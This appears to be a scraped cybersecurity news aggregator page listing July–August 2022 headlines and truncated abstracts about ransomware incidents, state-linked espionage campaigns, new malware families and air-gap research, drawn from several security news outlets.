The Cuba ransomware gang claimed to have stolen files on August 19, including financial documents and source code. They allegedly obtained correspondence with bank employees, balance sheets, account activity, compensation data, and tax documents.Security Week
August 31, 2022
Chinese Hackers Used ScanBox Framework in Recent Cyber Espionage Attacks Full Text
Abstract
A months-long cyber espionage campaign undertaken by a Chinese nation-state group targeted several entities with reconnaissance malware so as to glean information about its victims and meet its strategic goals. "The targets of this recent campaign spanned Australia, Malaysia, and Europe, as well as entities that operate in the South China Sea," enterprise security firm Proofpoint said in a report published in partnership with PwC. Targets encompass local and federal Australian governmental agencies, Australian news media companies, and global heavy industry manufacturers which conduct maintenance of fleets of wind turbines in the South China Sea. Proofpoint and PwC attributed the intrusions with moderate confidence to a threat actor tracked by the two companies under the names TA423 and Red Ladon respectively, which is also known as APT40 and Leviathan. APT40 is the name designated to a China-based, espionage-motivated threat actor that's known to be active since 2013 andThe Hacker News
August 30, 2022
Three campaigns delivering multiple malware, including ModernLoader and XMRig miner Full Text
Abstract
Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners. Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering...Security Affairs
August 30, 2022
World’s largest distributors of books Baker & Taylor hit by ransomware Full Text
Abstract
Baker &amp; Taylor, one of the world's largest distributors of books, revealed that it was hit by a ransomware attack. Baker &amp; Taylor, one of the largest distributors of books worldwide, suffered a ransomware attack on August 23. The incident...Security Affairs
August 29, 2022
Leading library services firm Baker & Taylor hit by ransomware Full Text
Abstract
Baker & Taylor, which describes itself as the world's largest distributor of books to libraries worldwide, today confirmed it's still working on restoring systems after being hit by ransomware more than a week ago.BleepingComputer
August 29, 2022
Update: U.K. NHS cyberattack causing ‘total chaos’ in hospitals could take a year to recover Full Text
Abstract
It has been 22 days since the outage and Carenotes is yet to be restored. Staff at a Birmingham hospital were told on 17 August that restoration could take a further five weeks.Independent
August 27, 2022
Unprecedented cyber attack hit State Infrastructure of Montenegro Full Text
Abstract
The state infrastructure of Montenegro was hit by a massive and "unprecedented" cyber attack, authorities announced. An unprecedented cyber attack hit the government digital infrastructure in Montenegro; the government promptly adopted measures...Security Affairs
August 25, 2022
Update: Twilio, Cloudflare Attacked in Campaign That Hit Over 130 Organizations Full Text
Abstract
The attacks disclosed recently by Twilio and Cloudflare were part of a massive phishing campaign that targeted at least 130 other organizations, according to cybersecurity company Group-IB.Security Week
August 25, 2022
LastPass developer systems hacked to steal source code Full Text
Abstract
Password management firm LastPass was hacked two weeks ago, enabling threat actors to steal the company's source code and proprietary technical information.BleepingComputer
August 25, 2022
GAIROSCOPE attack allows to exfiltrate data from Air-Gapped systems via ultrasonic tones Full Text
Abstract
GAIROSCOPE: An Israeli researcher demonstrated how to exfiltrate data from air-gapped systems using ultrasonic tones and smartphone gyroscopes. The popular researcher Mordechai Guri from the Ben-Gurion University of the Negev in Israel devised an attack...Security Affairs
August 25, 2022
Researchers Uncover Kimsuky Infra Targeting South Korean Politicians and Diplomats Full Text
Abstract
The North Korean nation-state group Kimsuky has been linked to a new set of malicious activities directed against political and diplomatic entities located in its southern counterpart in early 2022. Russian cybersecurity firm Kaspersky codenamed the cluster GoldDragon, with the infection chains leading to the deployment of Windows malware designed to steal file lists, user keystrokes, and stored web browser login credentials. Included among the potential victims are South Korean university professors, think tank researchers, and government officials. Kimsuky, also known as Black Banshee, Thallium, and Velvet Chollima, is the name given to a prolific North Korean advanced persistent threat (APT) group that targets entities globally, but with a primary focus on South Korea, to gain intelligence on various topics of interest to the regime. Known to be operating since 2012, the group has a history of employing social engineering tactics, spear-phishing, and watering hole attacks to exfThe Hacker News
August 24, 2022
RansomEXX claims ransomware attack on Sea-Doo, Ski-Doo maker Full Text
Abstract
The RansomEXX ransomware gang is claiming responsibility for the cyberattack against Bombardier Recreational Products (BRP), disclosed by the company on August 8, 2022.BleepingComputer
August 24, 2022
France hospital Center Hospitalier Sud Francilien suffered ransomware attack Full Text
Abstract
A French hospital, the Center Hospitalier Sud Francilien (CHSF), suffered a cyberattack on Sunday and was forced to refer patients to other structures. The Center Hospitalier Sud Francilien (CHSF), a hospital southeast of Paris, has suffered...Security Affairs
August 24, 2022
Researchers Warn of AiTM Attack Targeting Google G-Suite Enterprise Users Full Text
Abstract
The threat actors behind a large-scale adversary-in-the-middle (AiTM) phishing campaign targeting enterprise users of Microsoft email services have also set their sights on Google Workspace users. "This campaign specifically targeted chief executives and other senior members of various organizations which use [Google Workspace]," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu detailed in a report published this month. The AiTM phishing attacks are said to have commenced in mid-July 2022, following a similar modus operandi as that of a social engineering campaign designed to siphon users' Microsoft credentials and even bypass multi-factor authentication. The low-volume Gmail AiTM phishing campaign also entails using the compromised emails of chief executives to conduct further social engineering, with the attacks also utilizing several compromised domains as an intermediate URL redirector to take the victims to the final landing page. Attack chaThe Hacker News
August 23, 2022
French hospital hit by $10M ransomware attack, sends patients elsewhere Full Text
Abstract
The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries.BleepingComputer
August 20, 2022
New Grandoreiro Banking Malware Campaign Targeting Spanish Manufacturers Full Text
Abstract
Organizations in the Spanish-speaking nations of Mexico and Spain are in the crosshairs of a new campaign designed to deliver the Grandoreiro banking trojan. "In this campaign, the threat actors impersonate government officials from the Attorney General's Office of Mexico City and from the Public Ministry in the form of spear-phishing emails in order to lure victims to download and execute 'Grandoreiro,' a prolific banking trojan that has been active since at least 2016, and that specifically targets users in Latin America," Zscaler said in a report. The ongoing attacks, which commenced in June 2022, have been observed to target automotive, civil and industrial construction, logistics, and machinery sectors via multiple infection chains in Mexico and chemicals manufacturing industries in Spain. Attack chains entail leveraging spear-phishing emails written in Spanish to trick potential victims into clicking on an embedded link that retrieves a ZIP archiveThe Hacker News
August 20, 2022
Whitworth University Still Recovering from Ransomware Attack Full Text
Abstract
Whitworth University is taking steps to shore up its cyber defenses following a reported ransomware attack that has left the university's network crippled since late last month.Government Technology
August 19, 2022
Bumblebee attacks, from initial access to the compromise of Active Directory Services Full Text
Abstract
Threat actors are using the Bumblebee loader to compromise Active Directory services as part of post-exploitation activities. The Cybereason Global Security Operations Center (GSOC) Team analyzed a cyberattack that involved the Bumblebee...Security Affairs
August 19, 2022
SAP Vulnerability Exploited in Attacks After Details Disclosed at Hacker Conferences Full Text
Abstract
The SAP vulnerability added to CISA’s list, tracked as CVE-2022-22536, was patched by the vendor in February in NetWeaver Application Server ABAP, NetWeaver Application Server Java, ABAP Platform, Content Server 7.53 and Web Dispatcher.Security Week
August 19, 2022
Estonia blocked cyberattacks claimed by Pro-Russia Killnet group Full Text
Abstract
Estonia announced that it had blocked a wave of cyber attacks conducted by Russian hackers against local institutions. Undersecretary for Digital Transformation Luukas Ilves announced that Estonia was hit by the most extensive wave of DDoS attacks it has faced...Security Affairs
August 18, 2022
LockBit claims ransomware attack on security giant Entrust Full Text
Abstract
The LockBit ransomware gang has claimed responsibility for the June cyberattack on digital security giant Entrust.BleepingComputer
August 18, 2022
Russian Cyber Attacks on Ukraine driven by Government Groups Full Text
Abstract
Russia's nation-state crews have been breaking into Ukrainian networks and attempting to disrupt or even destroy vulnerable systems. A bevy of attacks and malware samples can all be tied back to Kremlin-backed hacking groups.Tech Target
August 17, 2022
RedAlpha Conducts Multi-Year Credential Theft Campaign Targeting Critical Entities Globally Full Text
Abstract
Chinese state-sponsored threat activity group RedAlpha has been registering and weaponizing hundreds of domains spoofing global organizations to target government organizations and think tanks globally.Recorded Future
August 17, 2022
North Korean hackers use signed macOS malware to target IT job seekers Full Text
Abstract
North Korean hackers from the Lazarus group have been using a signed malicious executable for macOS to impersonate Coinbase and lure in employees in the financial technology sector.BleepingComputer
August 16, 2022
New Evil PLC Attack Weaponizes PLCs to Breach OT and Enterprise Networks Full Text
Abstract
Cybersecurity researchers have detailed a novel attack technique that weaponizes programmable logic controllers (PLCs) to gain an initial foothold in engineering workstations and subsequently invade the operational technology (OT) networks. Dubbed the "Evil PLC" attack by industrial security firm Claroty, the issue impacts engineering workstation software from Rockwell Automation, Schneider Electric, GE, B&R, Xinje, OVARRO, and Emerson. Programmable logic controllers are a crucial component of industrial devices that control manufacturing processes in critical infrastructure sectors. PLCs, besides orchestrating the automation tasks, are also configured to start and stop processes and generate alarms. It's hence not surprising that the entrenched access provided by PLCs has made the machines a focus of sophisticated attacks for more than a decade, starting from Stuxnet to PIPEDREAM (aka INCONTROLLER), with the goal of causing physical disruptions. "TheThe Hacker News
August 16, 2022
Hackers attack UK water supplier but extort wrong company Full Text
Abstract
South Staffordshire Water, a company supplying 330 million liters of drinking water to 1.6 million consumers daily, has issued a statement confirming IT disruption from a cyberattack.BleepingComputer
August 16, 2022
Hackers attack UK water supplier with 1.6 million customers Full Text
Abstract
South Staffordshire Water, a company supplying 330 million liters of drinking water to 1.6 million consumers daily, has issued a statement confirming IT disruption from a cyberattack.BleepingComputer
August 15, 2022
Russian State Hackers Continue to Attack Ukrainian Entities with Infostealer Malware Full Text
Abstract
Russian state-sponsored actors are continuing to strike Ukrainian entities with information-stealing malware as part of what's suspected to be an espionage operation. Symantec, a division of Broadcom Software, attributed the malicious campaign to a threat actor tracked as Shuckworm, also known as Actinium, Armageddon, Gamaredon, Primitive Bear, and Trident Ursa. The findings have been corroborated by the Computer Emergency Response Team of Ukraine (CERT-UA). The threat actor, active since at least 2013, is known for explicitly singling out public and private entities in Ukraine. The attacks have since ratcheted up in the wake of Russia's military invasion in late 2022. The latest set of attacks are said to have commenced on July 15, 2022, and to be ongoing as recently as August 8, with the infection chains leveraging phishing emails disguised as newsletters and combat orders, ultimately leading to the deployment of a PowerShell stealer malware dubbed GammaLoad.PS1_v2.The Hacker News
August 15, 2022
Argentina’s Judiciary of Córdoba hit by PLAY ransomware attack Full Text
Abstract
Argentina's Judiciary of Córdoba has shut down its IT systems after suffering a ransomware attack, reportedly at the hands of the new 'Play' ransomware operation.BleepingComputer
August 15, 2022
Russian hackers target Ukraine with default Word template hijacker Full Text
Abstract
Threat analysts monitoring cyberattacks on Ukraine report that the operations of the notorious Russian state-backed hacking group 'Gamaredon' continue to heavily target the war-torn country.BleepingComputer
August 13, 2022
Cedar Rapids schools pay ransom in cyber attack Full Text
Abstract
The Cedar Rapids school district paid a ransom in hopes of keeping personal data compromised in a cyberattack last month from being released, the school superintendent has told parents.The Gazette
August 11, 2022
Cisco Confirms It’s Been Hacked by Yanluowang Ransomware Gang Full Text
Abstract
Networking equipment major Cisco on Wednesday confirmed it was the victim of a cyberattack on May 24, 2022, after the attackers got hold of an employee's personal Google account that contained passwords synced from their web browser. "Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee's personal Google account," Cisco Talos said in a detailed write-up. "The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account." The disclosure comes as cybercriminal actors associated with the Yanluowang ransomware gang published a list of files from the breach to their data leak site on August 10. The exfiltrated information, according to Talos, included the contents of a Box cloud storage folder that was associated with the compromised employee's account and is not believed to have included any valuablThe Hacker News
August 11, 2022
Hackers Behind Cuba Ransomware Attacks Using New RAT Malware Full Text
Abstract
Threat actors associated with the Cuba ransomware have been linked to previously undocumented tactics, techniques and procedures (TTPs), including a new remote access trojan called ROMCOM RAT on compromised systems. The new findings come from Palo Alto Networks' Unit 42 threat intelligence team, which is tracking the double extortion ransomware group under the constellation-themed moniker Tropical Scorpius. Cuba ransomware (aka COLDDRAW), which was first detected in December 2019, reemerged on the threat landscape in November 2021 and has been attributed to attacks against 60 entities in five critical infrastructure sectors, amassing at least $43.9 million in ransom payments. Of the 60 victims listed on its data leak site, 40 are located in the U.S., indicating a less global distribution of targeted organizations than other ransomware gangs. "Cuba ransomware is distributed through Hancitor malware, a loader known for dropping or executing stealers, such as RemoteThe Hacker News
August 11, 2022
UK NHS service recovery may take a month after MSP ransomware attack Full Text
Abstract
Managed service provider (MSP) Advanced confirmed that a ransomware attack on its systems caused the disruption of emergency services (111) from the United Kingdom's National Health Service (NHS).BleepingComputer
August 10, 2022
Cisco was hacked by the Yanluowang ransomware gang Full Text
Abstract
Cisco disclosed a security breach: the Yanluowang ransomware group breached its corporate network in late May and stole internal data.Security Affairs
August 10, 2022
Experts Uncover Details on Maui Ransomware Attack by North Korean Hackers Full Text
Abstract
The first ever incident possibly involving the ransomware family known as Maui occurred on April 15, 2021, aimed at an unnamed Japanese housing company. The disclosure from Kaspersky arrives a month after U.S. cybersecurity and intelligence agencies issued an advisory about the use of the ransomware strain by North Korean government-backed hackers to target the healthcare sector since at least May 2021. Much of the data about its modus operandi came from incident response activities and industry analysis of a Maui sample that revealed a lack of "several key features" typically associated with ransomware-as-a-service (RaaS) operations. Not only is Maui designed to be manually executed by a remote actor via a command-line interface, it's also notable for not including a ransom note to provide recovery instructions. Subsequently, the Justice Department announced the seizure of $500,000 worth of Bitcoin that were extorted from several organizations, including two heThe Hacker News
August 10, 2022
Hacker uses new RAT malware in Cuba Ransomware attacks Full Text
Abstract
A member of the Cuba ransomware operation is employing previously unseen tactics, techniques, and procedures (TTPs), including a novel RAT (remote access trojan) and a new local privilege escalation tool.BleepingComputer
August 9, 2022
Chinese actors behind attacks on industrial enterprises and public institutions Full Text
Abstract
China-linked threat actors targeted dozens of industrial enterprises and public institutions in Afghanistan and Europe. In January 2022, researchers at Kaspersky ICS CERT uncovered a series of targeted attacks on military industrial enterprises and public...Security Affairs
August 08, 2022
Meta Cracks Down on Cyber Espionage Operations in South Asia Abusing Facebook Full Text
Abstract
Facebook parent company Meta disclosed that it took action against two espionage operations in South Asia that leveraged its social media platforms to distribute malware to potential targets. The first set of activities is what the company described as "persistent and well-resourced" and undertaken by a hacking group tracked under the moniker Bitter APT (aka APT-C-08 or T-APT-17) targeting individuals in New Zealand, India, Pakistan, and the U.K. "Bitter used various malicious tactics to target people online with social engineering and infect their devices with malware," Meta said in its Quarterly Adversarial Threat Report. "They used a mix of link-shortening services, malicious domains, compromised websites, and third-party hosting providers to distribute their malware." The attacks involved the threat actor creating fictitious personas on the platform, masquerading as attractive young women in a bid to build trust with targets and lure them into clThe Hacker News
August 7, 2022
Serious cyberattack hits German Chambers of Industry and Commerce (DIHK) Full Text
Abstract
A massive cyberattack hit the website of the German Chambers of Industry and Commerce (DIHK) this week, forcing the organization to shut down its IT systems as a precautionary...Security Affairs
August 05, 2022
Iranian Hackers likely Behind Disruptive Cyberattacks Against Albanian Government Full Text
Abstract
A threat actor working to further Iranian goals is said to have been behind a set of disruptive cyberattacks against Albanian government services in mid-July 2022. Cybersecurity firm Mandiant said the malicious activity against a NATO state represented a "geographic expansion of Iranian disruptive cyber operations." The July 17 attacks , according to Albania's National Agency of Information Society, forced the government to "temporarily close access to online public services and other government websites" because of a "synchronized and sophisticated cybercriminal attack from outside Albania." The politically motivated disruptive operation, per Mandiant, entailed the deployment of a new ransomware family called ROADSWEEP that included a ransom note with the text: "Why should our taxes be spent on the benefit of DURRES terrorists?" A front named HomeLand Justice has since claimed credit for the cyber offensive, with the group also alleThe Hacker News
August 05, 2022
Hackers are actively exploiting password-stealing flaw in Zimbra Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has added the Zimbra CVE-2022-27824 flaw to its 'Known Exploited Vulnerabilities Catalog,' indicating that it is actively exploited in attacks by hackers.BleepingComputer
August 5, 2022
Disruptive Roadsweep Ransomware Attacks on NATO Member Albania Linked to Iran Full Text
Abstract
The Albanian government announced in mid-July that it was forced to shut down some public online services due to a cyberattack. Mandiant has investigated the incident, which led to the discovery of a new piece of ransomware.Security Week
August 05, 2022
A Growing Number of Malware Attacks Leveraging Dark Utilities ‘C2-as-a-Service’ Full Text
Abstract
A nascent service called Dark Utilities has already attracted 3,000 users for its ability to provide command-and-control (C2) services with the goal of commandeering compromised systems. "It is marketed as a means to enable remote access, command execution, distributed denial-of-service (DDoS) attacks and cryptocurrency mining operations on infected systems," Cisco Talos said in a report shared with The Hacker News. Dark Utilities, which emerged in early 2022, is advertised as a "C2-as-a-Service" (C2aaS), offering access to infrastructure hosted on the clearnet as well as the TOR network and associated payloads with support for Windows, Linux, and Python-based implementations for a mere €9.99. Authenticated users on the platform are presented with a dashboard that makes it possible to generate new payloads tailored to a specific operating system that can then be deployed and executed on victim hosts. Additionally, users are provided an administrative panelThe Hacker News
August 4, 2022
New Woody RAT used in attacks aimed at Russian entities Full Text
Abstract
Malwarebytes researchers observed an unknown threat actor targeting Russian organizations with a new remote access trojan called Woody RAT.Security Affairs
August 04, 2022
New Woody RAT Malware Being Used to Target Russian Organizations Full Text
Abstract
An unknown threat actor has been targeting Russian entities with a newly discovered remote access trojan called Woody RAT for at least a year as part of a spear-phishing campaign. The advanced custom backdoor is said to be delivered via either of two methods: archive files or Microsoft Office documents leveraging the now-patched "Follina" support diagnostic tool vulnerability (CVE-2022-30190) in Windows. Like other implants engineered for espionage-oriented operations, Woody RAT sports a wide range of features that enables the threat actor to remotely commandeer and steal sensitive information from the infected systems. "The earliest versions of this RAT were typically archived into a ZIP file pretending to be a document specific to a Russian group," Malwarebytes researchers Ankur Saini and Hossein Jazi said in a Wednesday report. "When the Follina vulnerability became known to the world, the threat actor switched to it to distribute the payload."The Hacker News
August 04, 2022
Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage Full Text
Abstract
A threat actor is said to have "highly likely" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector. The attack, which transpired over a seven-day period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as TAC-040. "The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory," the company said. "After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment." The Atlassian vulnerability suspected to have been exploited is CVE-2022-26134, an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.The Hacker News
August 04, 2022
German Chambers of Industry and Commerce hit by ‘massive’ cyberattack Full Text
Abstract
The Association of German Chambers of Industry and Commerce (DIHK) was forced to shut down all of its IT systems and switch off digital services, telephones, and email servers, in response to a cyberattack.BleepingComputer
August 03, 2022
Russian organizations attacked with new Woody RAT malware Full Text
Abstract
Unknown attackers target Russian entities with newly discovered malware that allows them to control and steal information from compromised devices remotely.BleepingComputer
August 3, 2022
Power semiconductor component manufacturer Semikron suffered a ransomware attack Full Text
Abstract
Semikron, a German-based independent manufacturer of power semiconductor components, suffered a ransomware cyberattack. The company employs more than...Security Affairs
August 03, 2022
Spanish research agency still recovering after ransomware attack Full Text
Abstract
The Spanish National Research Council (CSIC) last month was hit by a ransomware attack that is now attributed to Russian hackers.BleepingComputer
August 03, 2022
Researchers Warn of Large-Scale AiTM Attacks Targeting Enterprise Users Full Text
Abstract
A new, large-scale phishing campaign has been observed using adversary-in-the-middle (AitM) techniques to get around security protections and compromise enterprise email accounts. "It uses an adversary-in-the-middle (AitM) attack technique capable of bypassing multi-factor authentication," Zscaler researchers Sudeep Singh and Jagadeeswar Ramanukolanu said in a Tuesday report. "The campaign is specifically designed to reach end users in enterprises that use Microsoft's email services." Prominent targets include fintech, lending, insurance, energy, manufacturing, and federal credit union verticals located in the U.S., U.K., New Zealand, and Australia. This is not the first time such a phishing attack has come to light. Last month, Microsoft disclosed that over 10,000 organizations had been targeted since September 2021 by means of AitM techniques to breach accounts secured with multi-factor authentication (MFA). The ongoing campaign, effective June 2022,The Hacker News
August 02, 2022
Semiconductor manufacturer Semikron hit by LV ransomware attack Full Text
Abstract
German power electronics manufacturer Semikron has disclosed that it was hit by a ransomware attack that partially encrypted the company's network.BleepingComputer
August 2, 2022
GoLang-based ‘Manjusaka’ Attack Framework Imitates Sliver and Cobalt Strike Full Text
Abstract
Cisco Talos recently discovered a new attack framework called "Manjusaka" being used in the wild that has the potential to become prevalent across the threat landscape. This framework is advertised as an imitation of Cobalt Strike.Cisco Talos
August 02, 2022
EU missile maker MBDA confirms data theft extortion, denies breach Full Text
Abstract
MBDA, one of the largest missile developers and manufacturers in Europe, has responded to rumors about a cyberattack on its infrastructure saying that claims of a breach of its systems are false.BleepingComputer
August 01, 2022
BlackCat ransomware claims attack on European gas pipeline Full Text
Abstract
The ransomware group known as ALPHV (aka BlackCat) has assumed over the weekend responsibility for the cyberattack that hit Creos Luxembourg last week, a natural gas pipeline and electricity network operator in the central European country.BleepingComputer
July 29, 2022
Microsoft links Raspberry Robin malware to Evil Corp attacks Full Text
Abstract
Microsoft has discovered that an access broker it tracks as DEV-0206 uses the Raspberry Robin Windows worm to deploy a malware downloader on networks where it also found evidence of malicious activity matching Evil Corp tactics.BleepingComputer
July 28, 2022
Microsoft Uncovers Austrian Company Exploiting Windows and Adobe Zero-Day Exploits Full Text
Abstract
A cyber mercenary that "ostensibly sells general security and information analysis services to commercial customers" used several Windows and Adobe zero-day exploits in limited and highly-targeted attacks against European and Central American entities. The company, which Microsoft describes as a private-sector offensive actor (PSOA), is an Austria-based outfit called DSIRF that's linked to the development and attempted sale of a piece of cyberweapon referred to as Subzero, which can be used to hack targets' phones, computers, and internet-connected devices. "Observed victims to date include law firms, banks, and strategic consultancies in countries such as Austria, the United Kingdom, and Panama," the tech giant's cybersecurity teams said in a Wednesday report. Microsoft is tracking the actor under the moniker KNOTWEED, continuing its trend of naming PSOAs using names given to trees and shrubs. The company previously designated the name SOURGThe Hacker News
July 28, 2022
European firm DSIRF behind the attacks with Subzero surveillance malware Full Text
Abstract
Microsoft linked a private-sector offensive actor (PSOA) to attacks using multiple zero-day exploits for its Subzero malware. The Microsoft Threat Intelligence Center (MSTIC) and the Microsoft Security Response Center (MSRC) researchers linked a threat...Security Affairs
July 28, 2022
As Microsoft blocks Office macros, hackers find new attack vectors Full Text
Abstract
Hackers who normally distributed malware via phishing attachments with malicious macros gradually changed tactics after Microsoft Office began blocking them by default, switching to new file types such as ISO, RAR, and Windows Shortcut (LNK) attachments.BleepingComputer
July 27, 2022
Attackers increasingly abusing IIS extensions to establish covert backdoors Full Text
Abstract
Microsoft warns that threat actors are increasingly abusing Internet Information Services (IIS) extensions to maintain persistence on target servers.Security Affairs
July 26, 2022
Microsoft Exchange servers increasingly hacked with IIS backdoors Full Text
Abstract
Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells.BleepingComputer
July 26, 2022
Zero Day attacks target online stores using PrestaShop Full Text
Abstract
Threat actors are exploiting a zero-day vulnerability to steal payment information from sites using the open source e-commerce platform PrestaShop.Security Affairs
July 26, 2022
LockBit claims ransomware attack on Italian tax agency Full Text
Abstract
Italian authorities are investigating claims made by the LockBit ransomware gang that they breached the network of the Italian Internal Revenue Service (L'Agenzia delle Entrate).BleepingComputer
July 24, 2022
Roaming Mantis Financial Hackers Targeting Android and iPhone Users in France Full Text
Abstract
The mobile threat campaign tracked as Roaming Mantis has been linked to a new wave of compromises directed against French mobile phone users, months after it expanded its targeting to include European countries. No fewer than 70,000 Android devices are said to have been infected as part of the active malware operation, Sekoia said in a report published last week. Attack chains involving Roaming Mantis, a financially motivated Chinese threat actor, are known to either deploy a piece of banking trojan named MoqHao (aka XLoader) or redirect iPhone users to credential harvesting landing pages that mimic the iCloud login page. "MoqHao (aka Wroba, XLoader for Android) is an Android remote access trojan (RAT) with information-stealing and backdoor capabilities that likely spreads via SMS," Sekoia researchers said. It all starts with a phishing SMS, a technique known as smishing, enticing users with package delivery-themed messages containing rogue links, that, when clicThe Hacker News
July 23, 2022
North Korean hackers attack EU targets with Konni RAT malware Full Text
Abstract
Threat analysts have uncovered a new campaign attributed to APT37, a North Korean group of hackers, targeting high-value organizations in the Czech Republic, Poland, and other European countries.BleepingComputer
July 22, 2022
Ukrainian Radio Stations Hacked to Broadcast Fake News About Zelenskyy’s Health Full Text
Abstract
Ukrainian radio operator TAVR Media on Thursday became the latest victim of a cyberattack, resulting in the broadcast of a fake message that President Volodymyr Zelenskyy was seriously ill. "Cybercriminals spread information that the President of Ukraine, Volodymyr Zelenskyy, is allegedly in intensive care, and his duties are performed by the Chairman of the Verkhovna Rada, Ruslan Stefanchuk," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said in an update. The Kyiv-based holding company oversees nine major radio stations, including Hit FM, Radio ROKS, KISS FM, Radio RELAX, Melody FM, Nashe Radio, Radio JAZZ, Classic Radio, and Radio Bayraktar. In a separate post on Facebook, TAVR Media disclosed its servers and networks were targeted in a cyberattack and it's working to resolve the issue. The company also emphasized that "no information about the health problems of the President of Ukraine Volodymyr Zelenskyy isThe Hacker News
July 21, 2022
Hackers Target Ukrainian Software Company Using GoMet Backdoor Full Text
Abstract
A large software development company whose software is used by different state entities in Ukraine was at the receiving end of an "uncommon" piece of malware, new research has found. The malware, first observed on the morning of May 19, 2022, is a custom variant of the open source backdoor known as GoMet and is designed for maintaining persistent access to the network. "This access could be leveraged in a variety of ways including deeper access or to launch additional attacks, including the potential for software supply chain compromise," Cisco Talos said in a report shared with The Hacker News. Although there are no concrete indicators linking the attack to a single actor or group, the cybersecurity firm's assessment points to Russian nation-state activity. Public reporting into the use of GoMet in real-world attacks has so far uncovered only two documented cases to date: one in 2020, coinciding with the disclosure of CVE-2020-5902 , a critical remotThe Hacker News
July 21, 2022
Threat actors target software firm in Ukraine using GoMet backdoor Full Text
Abstract
Threat actors targeted a large software development company in Ukraine using the GoMet backdoor. Researchers from Cisco Talos discovered an uncommon piece of malware that was employed in an attack against a large Ukrainian software development company. The...Security Affairs
July 21, 2022
Cyberattackers Target Ukrainian Organizations Using GoMet Backdoor Full Text
Abstract
The original GoMet author posted the code on GitHub on March 31, 2019, and had commits until April 2, 2019. The backdoor itself is a rather simple piece of software written in the Go programming language.Cisco Talos
July 20, 2022
Elastix VoIP Systems Hacked to Serve Web shells Full Text
Abstract
A large-scale campaign was found targeting Elastix VoIP telephony servers with over 500,000 malware samples, over a period of three months. The campaign's goal was to plant a PHP web shell to run arbitrary commands on infected communications servers. The operation systematically exploited SIP serve ...Cyware Alerts - Hacker News
July 19, 2022
Building materials giant Knauf hit by Black Basta ransomware gang Full Text
Abstract
The Knauf Group has announced it has been the target of a cyberattack that has disrupted its business operations, forcing its global IT team to shut down all IT systems to isolate the incident.BleepingComputer
July 19, 2022
New Air-Gap Attack Uses SATA Cable as an Antenna to Transfer Radio Signals Full Text
Abstract
A new method devised to leak information and jump over air-gaps takes advantage of Serial Advanced Technology Attachment (SATA) or Serial ATA cables as a communication medium, adding to a long list of electromagnetic, magnetic, electric, optical, and acoustic methods already demonstrated to plunder data. "Although air-gap computers have no wireless connectivity, we show that attackers can use the SATA cable as a wireless antenna to transfer radio signals at the 6GHz frequency band," Dr. Mordechai Guri, the head of R&D in the Cyber Security Research Center in the Ben Gurion University of the Negev in Israel, wrote in a paper published last week. The technique, dubbed SATAn, takes advantage of the prevalence of the computer bus interface, making it "highly available to attackers in a wide range of computer systems and IT environments." Put simply, the goal is to use the SATA cable as a covert channel to emanate electromagnetic signals and transfer a brThe Hacker News
July 19, 2022
EU warns of Russian cyberattack spillover, escalation risks Full Text
Abstract
The Council of the European Union (EU) said today that Russian hackers and hacker groups increasingly attacking "essential" organizations worldwide could lead to spillover risks and potential escalation.BleepingComputer
July 19, 2022
Belgium says Chinese hackers attacked its Ministry of Defense Full Text
Abstract
The Minister for Foreign Affairs of Belgium says multiple Chinese state-backed threat groups targeted the country's defense and interior ministries.BleepingComputer
July 19, 2022
Air-gapped systems leak data via SATA cable WiFi antennas Full Text
Abstract
An Israeli security researcher has demonstrated a novel attack against air-gapped systems by leveraging the SATA cables inside computers as a wireless antenna to emanate data via radio signals.BleepingComputer
July 18, 2022
Israel: Health Ministry Website Faces Cyberattack, Overseas Access Blocked Full Text
Abstract
Israel's Health Ministry website faced disrupted access to users abroad, reportedly due to a cyberattack, the ministry said Sunday. Pro-Iranian hackers based in Iraq, called Altahrea Team, claimed responsibility for the cyberattack.i24 News
July 18, 2022
Lithuanian ad website hit by cyberattack, warns of possible customer data leak Full Text
Abstract
The portal stressed it did not store particularly sensitive information, such as bank account and payment card details, personal ID codes, and home addresses in its database.Lrt
July 18, 2022
A massive cyberattack hit Albania Full Text
Abstract
Albania was hit by a massive cyberattack over the weekend, the government confirmed on Monday. A synchronized criminal attack from abroad forced all Albanian government systems to shut down.Security Affairs
July 18, 2022
India: Capital markets regulator SEBI files FIR in cybersecurity incident as email accounts of 11 officials hacked Full Text
Abstract
The Securities and Exchange Board of India (Sebi) on Saturday said it has lodged a complaint against a cybersecurity incident it noticed on its e-mail system. However, the regulator added that no sensitive data was stolen.Live Mint
July 16, 2022
New Qakbot Attacks are Much Stealthier and Effective than Ever Full Text
Abstract
Zscaler exposed new detection evasion attempts by Qakbot malware actors. It is now using ZIP file extensions, catchy file names with common formats, and Excel 4.0 macros to fool victims into downloading attachments containing the malware. To stay protected from such threats, organizations are ...Cyware Alerts - Hacker News
July 16, 2022
Digium Phones Under Attack: Insight Into the Web Shell Implant Full Text
Abstract
Researchers at Unit 42 observed an operation that targets the Elastix system used in Digium phones. The attacker implants a web shell to exfiltrate data by downloading and executing additional payloads inside the target's Digium phone software.Palo Alto Networks
July 16, 2022
Threat actors exploit a flaw in Digium Phone Software to target VoIP servers Full Text
Abstract
Threat actors are targeting VoIP servers by exploiting a vulnerability in Digium's software to install a web shell, Palo Alto Networks warns. Recently, Unit 42 researchers spotted a campaign targeting the Elastix system used in Digium phones since...Security Affairs
July 15, 2022
Hackers Targeting VoIP Servers By Exploiting Digium Phone Software Full Text
Abstract
